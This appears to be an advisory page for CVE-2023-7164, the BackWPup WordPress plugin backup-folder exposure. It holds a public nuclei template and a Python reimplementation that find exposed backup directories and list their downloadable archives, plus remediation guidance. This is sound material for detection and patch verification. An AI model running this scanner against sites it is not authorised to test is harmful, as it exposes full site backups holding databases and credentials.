CVE-2023-7164: WordPress BackWPup < 4.0.4 - Backup File Disclosure

Date: 2026-01-08 | Affected software: WordPress BackWPup | PoC: public

Vulnerability description

BackWPup WordPress plugin versions before 4.0.4 contain a directory listing vulnerability: the plugin keeps its backup and temporary working folders under wp-content/uploads without any access restriction, so a web server that serves directory indexes exposes both the folder names and the archives inside them. An unauthenticated attacker can therefore enumerate and download full site backups; no authentication or user interaction is required.

PoC code [public]

id: CVE-2023-7164

info:
  name: WordPress BackWPup < 4.0.4 - Backup File Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    BackWPup WordPress plugin versions before 4.0.4 contain a directory listing vulnerability: the plugin keeps its backup and temporary folders under wp-content/uploads without any access restriction, so a web server that serves directory indexes exposes the folder names and the archives inside them. Unauthenticated attackers can enumerate and download site backups; no authentication is required.
  impact: |
    Unauthenticated attackers can download site backups, potentially leading to data theft or further exploitation.
  remediation: |
    Update to version 4.0.4 or later.
  reference:
    - https://wpscan.com/vulnerability/79b07f37-2c6b-4846-bb28-91a1e5bf112e/
    - https://research.cleantalk.org/cve-2023-7164/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-7164
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7164
    cwe-id: CWE-200
    epss-score: 0.35384
    epss-percentile: 0.96902
    cpe: cpe:2.3:a:inpsyde:backwpup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 8
    fofa-query: body="/wp-content/plugins/backwpup/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,backwpup,exposure,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/"
      - "{{BaseURL}}/blog/wp-content/uploads/"
      - "{{BaseURL}}/wordpress/wp-content/uploads/"
      - "{{BaseURL}}/wp/wp-content/uploads/"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Index of")'
          - 'regex("backwpup-[a-f0-9]{6}-(backups|temp)", body)'
        internal: true

    extractors:
      - type: regex
        name: backupfolder
        part: body
        regex:
          - 'backwpup-[a-f0-9]{6}-(backups|temp)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/{{backupfolder}}/"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '[\w\-\.]+\.(tar\.gz|tar|zip|sql)'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        part: body
        regex:
          - '[\w\-\.]+\.(tar\.gz|tar|zip|sql)'
# digest: 4a0a00473045022100f8b51242a18e91bb379fce0d5491d715a5a1038747866a506f2e6424cffd8edb02207f0b7b97d7962945cc7307b09bb517d7c9f8431b9958d367061e6ebf64287c92:922c64590222798bb761d5b6d8e72950
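The script below is an added example written for this page; it is not code from the template's author or from the BackWPup project. It reimplements the template's two-stage logic in Python so the check can be run against one host or exercised offline: stage one requests /wp-content/uploads/ under the same four install prefixes and looks for an "Index of" page naming a backwpup-xxxxxx-backups or -temp folder, stage two requests that folder and collects the archive names it lists, using the same regular expressions as the template. The host example.test, the sample autoindex pages and the offline_fetch helper are constructed for the demonstration. The caveat the template carries applies here too: a negative result only means no directory index was served, not that the folder is access-restricted, so a site with autoindex disabled can still serve an archive whose name an attacker learns another way.

```python
"""Two-stage check for CVE-2023-7164 (BackWPup < 4.0.4 backup folder exposure)."""
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Optional

# Same patterns and install prefixes as the public nuclei template.
BACKUP_FOLDER_RE = re.compile(r"backwpup-[a-f0-9]{6}-(?:backups|temp)")
BACKUP_FILE_RE = re.compile(r"[\w\-.]+\.(?:tar\.gz|tar|zip|sql)")
WP_PREFIXES = ("", "/blog", "/wordpress", "/wp")

Fetcher = Callable[[str], tuple[int, str]]


def http_get(url: str, timeout: float = 10.0) -> tuple[int, str]:
    """Fetch a URL and return (status, body); network errors are reported as status 0."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2023-7164-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            # 512 KiB is plenty for an autoindex page and bounds memory use.
            return resp.status, resp.read(512 * 1024).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


def find_backup_folder(body: str, status: int = 200) -> Optional[str]:
    """Stage 1: return the exposed BackWPup folder name, or None.

    Only a 200 directory index ("Index of") that names a backwpup folder counts;
    a 403/404 or a non-index page is treated as not exposed.
    """
    if status != 200 or "Index of" not in body:
        return None
    match = BACKUP_FOLDER_RE.search(body)
    return match.group(0) if match else None


def find_backup_files(body: str, status: int = 200) -> list[str]:
    """Stage 2: return the archive names listed in the folder index, de-duplicated.

    Autoindex pages repeat each name in the href and the link text, so raw regex
    hits are collapsed while keeping their order of appearance.
    """
    if status != 200:
        return []
    files: list[str] = []
    for match in BACKUP_FILE_RE.finditer(body):
        if match.group(0) not in files:
            files.append(match.group(0))
    return files


def check_site(base_url: str, fetch: Fetcher = http_get) -> Optional[dict]:
    """Probe the usual install prefixes and stop at the first exposed folder.

    Returns None when nothing is exposed, otherwise the folder URL and the archives
    it lists (an empty list means the folder name leaked but no archive was listed).
    """
    base = base_url.rstrip("/")
    for prefix in WP_PREFIXES:
        uploads_url = f"{base}{prefix}/wp-content/uploads/"
        status, body = fetch(uploads_url)
        folder = find_backup_folder(body, status)
        if folder is None:
            continue
        folder_url = f"{uploads_url}{folder}/"
        status, body = fetch(folder_url)
        return {"folder_url": folder_url, "files": find_backup_files(body, status)}
    return None


# Constructed sample bodies in the shape of an Apache autoindex page (not captured
# from a real site), used by the offline demonstration below.
SAMPLE_UPLOADS_INDEX = """<html><head><title>Index of /wp-content/uploads</title></head>
<body><h1>Index of /wp-content/uploads</h1>
<a href="2024/">2024/</a>
<a href="backwpup-1a2b3c-backups/">backwpup-1a2b3c-backups/</a>
<a href="backwpup-1a2b3c-temp/">backwpup-1a2b3c-temp/</a>
</body></html>"""

SAMPLE_FOLDER_INDEX = """<html><head><title>Index of /wp-content/uploads/backwpup-1a2b3c-backups</title></head>
<body><h1>Index of /wp-content/uploads/backwpup-1a2b3c-backups</h1>
<a href="../">Parent Directory</a>
<a href="backwpup_1a2b3c_2024-01-07_03-00-00.tar.gz">backwpup_1a2b3c_2024-01-07_03-00-00.tar.gz</a>
<a href="backwpup_1a2b3c_2024-01-08_03-00-00.zip">backwpup_1a2b3c_2024-01-08_03-00-00.zip</a>
</body></html>"""


def offline_fetch(url: str) -> tuple[int, str]:
    """Stand-in for http_get that serves the constructed pages for the hypothetical example.test."""
    pages = {
        "https://example.test/wp-content/uploads/": SAMPLE_UPLOADS_INDEX,
        "https://example.test/wp-content/uploads/backwpup-1a2b3c-backups/": SAMPLE_FOLDER_INDEX,
    }
    return (200, pages[url]) if url in pages else (404, "")


if __name__ == "__main__":
    # Usage: python check.py https://target.example   (no argument runs the offline demo)
    if len(sys.argv) > 1:
        result = check_site(sys.argv[1])
    else:
        result = check_site("https://example.test", offline_fetch)
    if result is None:
        print("no exposed BackWPup folder found")
    else:
        print(f"exposed folder: {result['folder_url']}")
        for name in result["files"]:
            print(f"  {name}")
```

Run it without arguments to see the offline demonstration, or pass a base URL to probe a host you are authorised to test. After updating to 4.0.4 or later, re-run it: a None result for every prefix is the expected outcome, and a folder that still returns a 200 index means the web server, not the plugin, is serving the listing and needs its own autoindex or access rule fixed.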
